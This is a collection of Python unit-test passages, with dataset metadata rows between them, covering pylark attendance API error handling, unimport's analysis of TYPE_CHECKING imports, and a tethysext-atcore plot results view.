self.module_cli.create_update_attendance_user_daily_shift = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_user_daily_shift(
pylark.CreateUpdateAttendanceUserDailyShiftReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_update_attendance_user_daily_shift = origin_func
def test_mock_self_func_get_attendance_user_approval(self):
origin_func = self.module_cli.get_attendance_user_approval
self.module_cli.get_attendance_user_approval = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_approval(
pylark.GetAttendanceUserApprovalReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_approval = origin_func
def test_mock_self_func_create_attendance_user_approval(self):
origin_func = self.module_cli.create_attendance_user_approval
self.module_cli.create_attendance_user_approval = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_user_approval(
pylark.CreateAttendanceUserApprovalReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_attendance_user_approval = origin_func
def test_mock_self_func_get_attendance_user_allowed_remedy(self):
origin_func = self.module_cli.get_attendance_user_allowed_remedy
self.module_cli.get_attendance_user_allowed_remedy = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_allowed_remedy(
pylark.GetAttendanceUserAllowedRemedyReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_allowed_remedy = origin_func
def test_mock_self_func_init_attendance_remedy_approval(self):
origin_func = self.module_cli.init_attendance_remedy_approval
self.module_cli.init_attendance_remedy_approval = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.init_attendance_remedy_approval(
pylark.InitAttendanceRemedyApprovalReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.init_attendance_remedy_approval = origin_func
def test_mock_self_func_update_attendance_remedy_approval(self):
origin_func = self.module_cli.update_attendance_remedy_approval
self.module_cli.update_attendance_remedy_approval = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_remedy_approval(
pylark.UpdateAttendanceRemedyApprovalReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_attendance_remedy_approval = origin_func
# mock raw request
class TestAttendanceSampleMockRawRequestFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestAttendanceSampleMockRawRequestFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.module_cli = self.cli.attendance
self.cli.raw_request = mock_raw_request
def test_mock_raw_request_download_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.download_attendance_file(
pylark.DownloadAttendanceFileReq(
file_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_upload_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.upload_attendance_file(pylark.UploadAttendanceFileReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_query_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.query_attendance_user_settings(
pylark.QueryAttendanceUserSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_update_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_settings(
pylark.UpdateAttendanceUserSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_update_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_group(
pylark.CreateUpdateAttendanceGroupReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_delete_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_group(
pylark.DeleteAttendanceGroupReq(
group_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_group(
pylark.GetAttendanceGroupReq(
group_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_shift(pylark.CreateAttendanceShiftReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_delete_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_shift(
pylark.DeleteAttendanceShiftReq(
shift_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_shift_by_id(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_id(
pylark.GetAttendanceShiftByIDReq(
shift_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_shift_by_name(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_name(
pylark.GetAttendanceShiftByNameReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_statistics_data(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_data(
pylark.GetAttendanceStatisticsDataReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_statistics_header(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_header(
pylark.GetAttendanceStatisticsHeaderReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_update_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_statistics_settings(
pylark.UpdateAttendanceUserStatisticsSettingsReq(
user_stats_view_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_statistics_settings(
pylark.GetAttendanceUserStatisticsSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_daily_shift(
pylark.GetAttendanceUserDailyShiftReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_task(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task(pylark.GetAttendanceUserTaskReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_flow(
pylark.GetAttendanceUserFlowReq(
user_flow_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_batch_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_get_attendance_user_flow(
pylark.BatchGetAttendanceUserFlowReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_batch_create_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_create_attendance_user_flow(
pylark.BatchCreateAttendanceUserFlowReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_task_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task_remedy(
pylark.GetAttendanceUserTaskRemedyReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_update_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_user_daily_shift(
pylark.CreateUpdateAttendanceUserDailyShiftReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_approval(
pylark.GetAttendanceUserApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_user_approval(
pylark.CreateAttendanceUserApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_attendance_user_allowed_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_allowed_remedy(
pylark.GetAttendanceUserAllowedRemedyReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_init_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.init_attendance_remedy_approval(
pylark.InitAttendanceRemedyApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_update_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_remedy_approval(
pylark.UpdateAttendanceRemedyApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
# real request
class TestAttendanceSampleRealRequestFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestAttendanceSampleRealRequestFailed, self).__init__(*args, **kwargs)
self.cli = app_no_permission.ins()
self.module_cli = self.cli.attendance
def test_real_request_download_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.download_attendance_file(
pylark.DownloadAttendanceFileReq(
file_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_upload_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.upload_attendance_file(pylark.UploadAttendanceFileReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_query_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.query_attendance_user_settings(
pylark.QueryAttendanceUserSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_update_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_settings(
pylark.UpdateAttendanceUserSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_update_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_group(
pylark.CreateUpdateAttendanceGroupReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_delete_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_group(
pylark.DeleteAttendanceGroupReq(
group_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_group(
pylark.GetAttendanceGroupReq(
group_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_shift(pylark.CreateAttendanceShiftReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_delete_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_shift(
pylark.DeleteAttendanceShiftReq(
shift_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_shift_by_id(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_id(
pylark.GetAttendanceShiftByIDReq(
shift_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_shift_by_name(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_name(
pylark.GetAttendanceShiftByNameReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_statistics_data(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_data(
pylark.GetAttendanceStatisticsDataReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_statistics_header(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_header(
pylark.GetAttendanceStatisticsHeaderReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_update_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_statistics_settings(
pylark.UpdateAttendanceUserStatisticsSettingsReq(
user_stats_view_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_statistics_settings(
pylark.GetAttendanceUserStatisticsSettingsReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_daily_shift(
pylark.GetAttendanceUserDailyShiftReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_task(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task(pylark.GetAttendanceUserTaskReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_flow(
pylark.GetAttendanceUserFlowReq(
user_flow_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_batch_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_get_attendance_user_flow(
pylark.BatchGetAttendanceUserFlowReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_batch_create_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_create_attendance_user_flow(
pylark.BatchCreateAttendanceUserFlowReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_task_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task_remedy(
pylark.GetAttendanceUserTaskRemedyReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_update_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_user_daily_shift(
pylark.CreateUpdateAttendanceUserDailyShiftReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_approval(
pylark.GetAttendanceUserApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_user_approval(
pylark.CreateAttendanceUserApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_attendance_user_allowed_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_allowed_remedy(
pylark.GetAttendanceUserAllowedRemedyReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_init_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.init_attendance_remedy_approval(
pylark.InitAttendanceRemedyApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_update_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_remedy_approval(
pylark.UpdateAttendanceRemedyApprovalReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
| 38.595413
| 88
| 0.687775
| 5,000
| 42,069
| 5.4484
| 0.0238
| 0.070846
| 0.0921
| 0.069378
| 0.97592
| 0.973754
| 0.965164
| 0.949747
| 0.916196
| 0.879524
| 0
| 0.001755
| 0.241437
| 42,069
| 1,089
| 89
| 38.630854
| 0.851905
| 0.002591
| 0
| 0.623188
| 1
| 0
| 0.036326
| 0.01535
| 0
| 0
| 0
| 0
| 0.228261
| 1
| 0.137681
| false
| 0
| 0.006039
| 0
| 0.148551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cfe62f89b359bd46da7d82fbdcfc5a36394be43
| 8,562
|
py
|
Python
|
tests/analyzer/test_type_variable.py
|
CAM-Gerlach/unimport
|
acaebf547274a95a33816e47ec22bb73d8456b17
|
[
"MIT"
] | 147
|
2019-09-19T15:43:06.000Z
|
2022-03-25T16:42:08.000Z
|
tests/analyzer/test_type_variable.py
|
CAM-Gerlach/unimport
|
acaebf547274a95a33816e47ec22bb73d8456b17
|
[
"MIT"
] | 154
|
2019-10-31T19:50:18.000Z
|
2022-03-29T12:43:00.000Z
|
tests/analyzer/test_type_variable.py
|
CAM-Gerlach/unimport
|
acaebf547274a95a33816e47ec22bb73d8456b17
|
[
"MIT"
] | 28
|
2019-10-31T18:11:13.000Z
|
2021-09-06T08:24:14.000Z
|
from tests.analyzer.utils import AnalyzerTestCase
from unimport.statement import Import, ImportFrom, Name
class TypeVariableTestCase(AnalyzerTestCase):
def test_union_import(self):
self.assertUnimportEqual(
source="""\
import typing
if typing.TYPE_CHECKING:
from PyQt5.QtWebEngineWidgets import QWebEngineHistory
from PyQt5.QtWebKit import QWebHistory
HistoryType = typing.Union['QWebEngineHistory', 'QWebHistory']
""",
expected_names=[
Name(lineno=2, name="typing.TYPE_CHECKING"),
Name(lineno=6, name="HistoryType"),
Name(lineno=6, name="QWebEngineHistory"),
Name(lineno=6, name="QWebHistory"),
Name(lineno=6, name="typing.Union"),
],
expected_imports=[
Import(
lineno=1,
column=1,
name="typing",
package="typing",
),
ImportFrom(
lineno=3,
column=1,
name="QWebEngineHistory",
package="PyQt5.QtWebEngineWidgets",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="QWebHistory",
package="PyQt5.QtWebKit",
star=False,
suggestions=[],
),
],
)
def test_union_from(self):
self.assertUnimportEqual(
source="""\
from typing import TYPE_CHECKING, Union
if TYPE_CHECKING:
from PyQt5.QtWebEngineWidgets import QWebEngineHistory
from PyQt5.QtWebKit import QWebHistory
HistoryType = Union['QWebEngineHistory', 'QWebHistory']
""",
expected_names=[
Name(lineno=2, name="TYPE_CHECKING"),
Name(lineno=6, name="HistoryType"),
Name(lineno=6, name="QWebEngineHistory"),
Name(lineno=6, name="QWebHistory"),
Name(lineno=6, name="Union"),
],
expected_imports=[
ImportFrom(
lineno=1,
column=1,
name="TYPE_CHECKING",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=1,
column=2,
name="Union",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=3,
column=1,
name="QWebEngineHistory",
package="PyQt5.QtWebEngineWidgets",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="QWebHistory",
package="PyQt5.QtWebKit",
star=False,
suggestions=[],
),
],
)
def test_union_attribute(self):
self.assertUnimportEqual(
source="""\
from typing import TYPE_CHECKING, Union
if TYPE_CHECKING:
from PyQt5 import QtWebEngineWidgets
from PyQt5 import QtWebKit
HistoryType = Union['QtWebEngineWidgets.QWebEngineHistory', 'QtWebKit.QWebHistory']
""",
expected_names=[
Name(lineno=2, name="TYPE_CHECKING"),
Name(lineno=6, name="HistoryType"),
Name(lineno=6, name="QtWebEngineWidgets.QWebEngineHistory"),
Name(lineno=6, name="QtWebKit.QWebHistory"),
Name(lineno=6, name="Union"),
],
expected_imports=[
ImportFrom(
lineno=1,
column=1,
name="TYPE_CHECKING",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=1,
column=2,
name="Union",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=3,
column=1,
name="QtWebEngineWidgets",
package="PyQt5",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="QtWebKit",
package="PyQt5",
star=False,
suggestions=[],
),
],
)
def test_cast_import(self):
self.assertUnimportEqual(
source="""\
import typing
if typing.TYPE_CHECKING:
from PyQt5.QtWebKit import QWebHistory
HistoryType = typing.cast('QWebHistory', None)
""",
expected_names=[
Name(lineno=2, name="typing.TYPE_CHECKING"),
Name(lineno=5, name="HistoryType"),
Name(lineno=5, name="QWebHistory"),
Name(lineno=5, name="typing.cast"),
],
expected_imports=[
Import(
lineno=1,
column=1,
name="typing",
package="typing",
),
ImportFrom(
lineno=3,
column=1,
name="QWebHistory",
package="PyQt5.QtWebKit",
star=False,
suggestions=[],
),
],
)
def test_cast_from(self):
self.assertUnimportEqual(
source="""\
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from PyQt5.QtWebKit import QWebHistory
HistoryType = cast('QWebHistory', return_value)
""",
expected_names=[
Name(lineno=2, name="TYPE_CHECKING"),
Name(lineno=5, name="HistoryType"),
Name(lineno=5, name="QWebHistory"),
Name(lineno=5, name="cast"),
Name(lineno=5, name="return_value"),
],
expected_imports=[
ImportFrom(
lineno=1,
column=1,
name="TYPE_CHECKING",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=3,
column=1,
name="QWebHistory",
package="PyQt5.QtWebKit",
star=False,
suggestions=[],
),
],
)
def test_cast_attribute(self):
self.assertUnimportEqual(
source="""\
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from PyQt5 import QtWebKit
HistoryType = cast('QtWebKit.QWebHistory', return_value)
""",
expected_names=[
Name(lineno=2, name="TYPE_CHECKING"),
Name(lineno=5, name="HistoryType"),
Name(lineno=5, name="QtWebKit.QWebHistory"),
Name(lineno=5, name="cast"),
Name(lineno=5, name="return_value"),
],
expected_imports=[
ImportFrom(
lineno=1,
column=1,
name="TYPE_CHECKING",
package="typing",
star=False,
suggestions=[],
),
ImportFrom(
lineno=3,
column=1,
name="QtWebKit",
package="PyQt5",
star=False,
suggestions=[],
),
],
)
| 32.555133
| 95
| 0.411002
| 575
| 8,562
| 6.036522
| 0.083478
| 0.083549
| 0.047537
| 0.051858
| 0.912993
| 0.880438
| 0.873812
| 0.870354
| 0.849611
| 0.796889
| 0
| 0.018759
| 0.495679
| 8,562
| 262
| 96
| 32.679389
| 0.785086
| 0
| 0
| 0.885714
| 0
| 0
| 0.254964
| 0.041462
| 0
| 0
| 0
| 0
| 0.02449
| 1
| 0.02449
| false
| 0
| 0.195918
| 0
| 0.22449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c21a3c3d2e0b8781bb69ca75cc08156ee1d4c22
| 23,482
|
py
|
Python
|
tethysext/atcore/tests/integrated_tests/controllers/resource_workflows/results_views/plot_workflow_results_view_tests.py
|
Aquaveo/tethysext-atcore
|
7a83ccea24fdbbe806f12154f938554dd6c8015f
|
[
"BSD-3-Clause"
] | 3
|
2020-11-05T23:50:47.000Z
|
2021-02-26T21:43:29.000Z
|
tethysext/atcore/tests/integrated_tests/controllers/resource_workflows/results_views/plot_workflow_results_view_tests.py
|
Aquaveo/tethysext-atcore
|
7a83ccea24fdbbe806f12154f938554dd6c8015f
|
[
"BSD-3-Clause"
] | 7
|
2020-10-29T16:53:49.000Z
|
2021-05-07T19:46:47.000Z
|
tethysext/atcore/tests/integrated_tests/controllers/resource_workflows/results_views/plot_workflow_results_view_tests.py
|
Aquaveo/tethysext-atcore
|
7a83ccea24fdbbe806f12154f938554dd6c8015f
|
[
"BSD-3-Clause"
] | null | null | null |
from unittest import mock
import pandas as pd
from tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view import PlotWorkflowResultView # noqa: E501
from tethysext.atcore.tests.utilities.sqlalchemy_helpers import SqlAlchemyTestCase
from tethysext.atcore.tests.utilities.sqlalchemy_helpers import setup_module_for_sqlalchemy_tests, \
tear_down_module_for_sqlalchemy_tests
from datetime import datetime
import numpy as np
def setUpModule():
setup_module_for_sqlalchemy_tests()
def tearDownModule():
tear_down_module_for_sqlalchemy_tests()
class PlotWorkflowResultViewTests(SqlAlchemyTestCase):
def setUp(self):
super().setUp()
self.instance = PlotWorkflowResultView()
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.BokehView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_bokeh(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'BokehView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
mock_pandas_data = mock.MagicMock(spec=pd.DataFrame)
mock_pandas_data.columns = ['foo', 'bar', 'baz']
mock_result.name = 'title'
mock_result.datasets = [{
'title': 'series title',
'dataset': mock_pandas_data,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['bokeh', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'BokehView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
# Test all things were called here
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
mock_options.get.assert_has_calls([
mock.call('page_title', 'title'),
mock.call('no_dataset_message', 'No dataset found.')],
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_plotly(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
mock_pandas_data_x = mock.MagicMock(spec=pd.DataFrame, to_list=mock.MagicMock())
mock_pandas_data_y = mock.MagicMock(spec=pd.DataFrame, to_list=mock.MagicMock())
mock_pandas_data_x.to_list.side_effect = [[1, 2, 3]]
mock_pandas_data_y.to_list.side_effect = [[4, 5, 6]]
mock_result.name = 'page_title'
data_test = [[datetime(2020, 1, 1), 5], [datetime(2020, 1, 2), 6], [datetime(2020, 1, 3), 7],
[datetime(2020, 1, 4), 8], [datetime(2020, 1, 5), 9], [datetime(2020, 1, 6), 10]]
df = pd.DataFrame(data=data_test)
mock_result.datasets = [{
'title': 'series title',
'dataset': df,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
